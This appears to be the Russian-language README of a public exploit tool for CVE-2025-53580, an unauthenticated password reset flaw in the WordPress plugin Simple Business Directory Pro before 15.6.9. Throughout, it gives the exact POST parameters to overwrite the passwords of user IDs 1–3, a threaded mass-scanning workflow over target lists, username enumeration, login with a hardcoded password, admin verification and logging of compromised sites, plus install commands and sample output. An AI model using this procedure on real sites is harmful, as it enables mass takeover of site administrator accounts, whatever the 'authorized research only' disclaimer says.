
Плагин WordPress Simple Business Directory Pro < 15.6.9 уязвим к повышению привилегий с высоким приоритетом.
Плагин WordPress Simple Business Directory Pro < 15.6.9 уязвим к повышению привилегий с высоким приоритетом
___ _ ___ __ __ __ ____ ____ ___ ____ __ __
/ (_)(_| |_// (_) / )/ \/ )| | / \| / \ / \
| | | \__ /| | / |___ |___ __/|___ \__/| |
| | | / -----/ | |/ \----- \ \ \/ \| |
\___/ \_/ \___/ /___\__//___\___/ \___/\___/\___/\__/ \__/
Корневая причина:
Плагин предоставляет пользовательскую форму восстановления пароля (qcpd-restore-pwd), которая принимает числовой qcpd-uid (ID пользователя WordPress) и новое значение pass. Никакой аутентификации, токена, nonce или проверки электронной почты перед изменением пароля не выполняется. Любой неаутентифицированный злоумышленник может сбросить пароль пользователя ID 1 (обычно администратора сайта) и любого другого пользователя, отправив один POST-запрос, а затем войти с внедрённым паролем, чтобы получить полный доступ администратора.
┌─────────────────────────────────────────────────────────────────┐
│ 1. Discover SBD restore page │
│ Probe 24 candidate paths → match body containing "sbd" │
│ │
│ 2. Reset passwords by user ID │
│ POST <restore_url> │
│ qcpd-restore-pwd = restore │
│ qcpd-restore-pwd-type = user │
│ qcpd-uid = 1 (then 2, then 3) │
│ pass = NxploitedNX │
│ │
│ 3. Enumerate usernames │
│ /?author=1..9 → redirect / body parse │
│ /wp-json/wp/v2/users → slug / username fields │
│ hostname heuristic + "admin" fallback │
│ │
│ 4. Login with injected password │
│ POST /wp-login.php log=<user> pwd=NxploitedNX │
│ Check: wordpress_logged_in cookie present │
│ │
│ 5. Verify admin access (dual method) │
│ GET /wp-json/wp/v2/users/me → capabilities.manage_options│
│ GET /wp-admin/users.php → adminmenu / users table │
│ │
│ 6. Write confirmed hit → Nx_sbd_login_hits.txt │
└─────────────────────────────────────────────────────────────────┘
git clone https://github.com/Nxploited/CVE-2025-53580.git
cd CVE-2025-53580
pip install -r requirements.txt
requirements.txt
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
python3 CVE-2025-53580.py
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Successful hits file [Nx_sbd_login_hits.txt]: Nx_sbd_login_hits.txt
Пароль, внедряемый во всех попытках сброса, задан внутри скрипта:
NxploitedNX
Целевые ID пользователей для каждого сайта:
1,2,3(настраивается черезMAX_USER_ID)
list.txthttps://target1.com
target2.com
http://target3.com
Инструмент сканирует 24 пути для каждой цели в поисках страницы, тело которой содержит sbd:
/login /log-in /signin /sign-in
/user-login /account/login /restore /password-reset
/reset-password /lost-password /lostpassword /user/restore
/my-account /members/login /member-login /customer-login
/wp-login.php /blog/login /auth/login /auth/restore
/sbd-login /sbd-restore /blog/log-in /account/log-in
Каждый успешный вход проверяется двумя независимыми способами перед записью на диск:
Метод 1 — REST API:
GET /wp-json/wp/v2/users/me
→ capabilities.manage_options = true → ADMIN CONFIRMED
Метод 2 — Панель управления:
GET /wp-admin/users.php
→ adminmenu / users table markers present → ADMIN CONFIRMED
Nx_sbd_login_hits.txt
[2025-06-01 14:22:10] https://target.com - type=ADMIN - user=admin
- login=/wp-login.php user=admin pass=NxploitedNX
- detail=ADMIN_CONFIRMED_REST(manage_options)
[2025-06-01 14:23:05] https://target2.com - type=USER - user=editor
- login=/wp-login.php user=editor pass=NxploitedNX
- detail=not_admin(rest_no_manage_options, wpadmin_no_strong_markers)
[info] https://target.com :: starting
[ok] https://target.com :: found front-end sbd page at https://target.com/my-account
[info] https://target.com :: starting qcpd-uid=1..3 brute with pass=NxploitedNX
[info] https://target.com :: POST uid=1 → status=302, Location=/my-account/?restored=1
[info] https://target.com :: POST uid=2 → status=302, Location=/my-account/?restored=1
[info] https://target.com :: extracting usernames and trying login
[ok] https://target.com :: login OK for user='admin', checking admin...
[ok] https://target.com :: HIT for user='admin' → admin=True,
detail=ADMIN_CONFIRMED_REST(manage_options)
[warn] https://target2.com :: no sbd page found in candidate restore paths, skipping
Nxploited (Khaled Alenazi)
GitHub → https://github.com/Nxploited
Telegram → @KNxploited
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.
The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.
Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.
© 2025 Nxploited · Simple Business Directory Pro < 15.6.9 · Исправлено в 15.6.9
| Поле | Детали |
|---|
| CVE | CVE-2025-53580 |
| Плагин | quantumcloud Simple Business Directory Pro (simple-business-directory-pro) |
| Затронуты | Все версии < 15.6.9 |
| Аутентификация | Не требуется |
| Тип | Неверное назначение привилегий → Неаутентифицированный сброс пароля |
| CWE | CWE-266 · Неверное назначение привилегий |
| Метод | Конечная точка |
|---|
| Редирект автора | /?author=1 → /?author=9 |
| REST API | /wp-json/wp/v2/users → slug + username |
| Эвристика по имени хоста | Первая метка домена |
| Жёстко заданное запасное значение | admin всегда включён |